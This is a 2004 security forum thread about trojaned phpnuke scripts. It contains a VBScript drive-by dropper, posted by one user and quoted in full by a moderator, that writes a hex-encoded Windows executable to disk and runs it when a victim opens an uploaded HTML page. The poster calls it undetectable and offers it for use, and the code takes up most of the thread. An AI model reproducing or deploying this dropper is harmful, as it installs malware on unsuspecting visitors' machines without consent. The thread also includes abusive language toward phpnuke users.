|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpnuke trojaned scripts. |
|
Posted: Wed Jun 16, 2004 1:05 am |
|
|
b0ilz |
Regular user |
|
|
Joined: May 31, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
It seems someone has trojaned alot of phpnuke scripts about 6 months ago. It seems these trojans are still in the wild today. It seems like all you fuckers running phpnuke are fucking gimps. fish in a barrel.
If you see .php?phc= in your access_log you are fucked. |
|
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 10:05 am |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
I have 2 undetectible PHP scripts which have trojan inside..
This is old,but still works..Upload HTML file that open download.php ..
Numbers are trojan HEX..
download.php
Quote: |
<script language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:\2.exe",1)
b.Write(H("4D5A90000300000004000000FFFF0000B800"))
b.Write(H("000000000000400000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("00000000000040000000504500004C010200"))
b.Write(H("000000000000000000000000E0000E010B01"))
b.Write(H("0000005C0000001400000000000057C80000"))
b.Write(H("001000000070000000004000001000000002"))
b.Write(H("000004000000010000000400000000000000"))
b.Write(H("00D000000004000000000000020000000000"))
b.Write(H("100000100000000010000010000000000000"))
b.Write(H("10000000000000000000000046C900003400"))
b.Write(H("000000A00000580000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000007400000000900000"))
b.Write(H("001000000000000000000000000000000000"))
b.Write(H("000000000000E00000C00000000061000000"))
b.Write(H("0030000000A000007A290000000200000000"))
b.Write(H("00000000000000000000E00000C04B45524E"))
b.Write(H("454C33322E646C6C0000004C6F61644C6962"))
b.Write(H("7261727941000047657450726F6341646472"))
b.Write(H("657373000000000000000000000000000000"))
b.Write(H("00000000000000000000000000000A040100"))
b.Write(H("D08040000200000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("00000000000000000000000027708C3F3807"))
b.Write(H("000000000100100000001800008000000000"))
b.Write(H("27708C3F3807000000000100010000003000"))
b.Write(H("00800000000027708C3F3807000000000100"))
b.Write(H("090400004800000058A0000000000000B004"))
b.Write(H("000000000000FF0E259C8040190CB80C9086"))
b.Write(H("438C21BC90A4C888649837B864C8328419B0"))
b.Write(H("0CC486437C21AC90A8C89464A032B419C010"))
b.Write(H("681011C70AE8F0DD02C219309409380B9C00"))
b.Write(H("4CA40D7AB419007B419E943A69FC55293E56"))
b.Write(H("1614012675A0035374147562320966035009"))
b.Write(H("00890A26EFF210C44D00AD8C7C2B58CF8EA4"))
b.Write(H("E14B018E0110EC857029862878228F1CDC81"))
b.Write(H("AC0056423521890E532A24CA7E0E7904C109"))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\2.exe")
self.moveto 0,0
self.resizeto 10000,10000
document.write("<a href="""" onmouseover=""javascript:window.close();""><img src=1.jpg WIDTH=3000 HEIGHT=3000 border=0></a>")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 1:59 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 2:22 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
SteX wrote: | I have 2 undetectible PHP scripts which have trojan inside..
This is old,but still works..Upload HTML file that open download.php ..
Numbers are trojan HEX..
download.php
Quote: |
<script language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:\2.exe",1)
b.Write(H("4D5A90000300000004000000FFFF0000B800"))
b.Write(H("000000000000400000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("00000000000040000000504500004C010200"))
b.Write(H("000000000000000000000000E0000E010B01"))
b.Write(H("0000005C0000001400000000000057C80000"))
b.Write(H("001000000070000000004000001000000002"))
b.Write(H("000004000000010000000400000000000000"))
b.Write(H("00D000000004000000000000020000000000"))
b.Write(H("100000100000000010000010000000000000"))
b.Write(H("10000000000000000000000046C900003400"))
b.Write(H("000000A00000580000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("000000000000000000007400000000900000"))
b.Write(H("001000000000000000000000000000000000"))
b.Write(H("000000000000E00000C00000000061000000"))
b.Write(H("0030000000A000007A290000000200000000"))
b.Write(H("00000000000000000000E00000C04B45524E"))
b.Write(H("454C33322E646C6C0000004C6F61644C6962"))
b.Write(H("7261727941000047657450726F6341646472"))
b.Write(H("657373000000000000000000000000000000"))
b.Write(H("00000000000000000000000000000A040100"))
b.Write(H("D08040000200000000000000000000000000"))
b.Write(H("000000000000000000000000000000000000"))
b.Write(H("00000000000000000000000027708C3F3807"))
b.Write(H("000000000100100000001800008000000000"))
b.Write(H("27708C3F3807000000000100010000003000"))
b.Write(H("00800000000027708C3F3807000000000100"))
b.Write(H("090400004800000058A0000000000000B004"))
b.Write(H("000000000000FF0E259C8040190CB80C9086"))
b.Write(H("438C21BC90A4C888649837B864C8328419B0"))
b.Write(H("0CC486437C21AC90A8C89464A032B419C010"))
b.Write(H("681011C70AE8F0DD02C219309409380B9C00"))
b.Write(H("4CA40D7AB419007B419E943A69FC55293E56"))
b.Write(H("1614012675A0035374147562320966035009"))
b.Write(H("00890A26EFF210C44D00AD8C7C2B58CF8EA4"))
b.Write(H("E14B018E0110EC857029862878228F1CDC81"))
b.Write(H("AC0056423521890E532A24CA7E0E7904C109"))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\2.exe")
self.moveto 0,0
self.resizeto 10000,10000
document.write("<a href="""" onmouseover=""javascript:window.close();""><img src=1.jpg WIDTH=3000 HEIGHT=3000 border=0></a>")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
|
|
Cool Men |
|
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|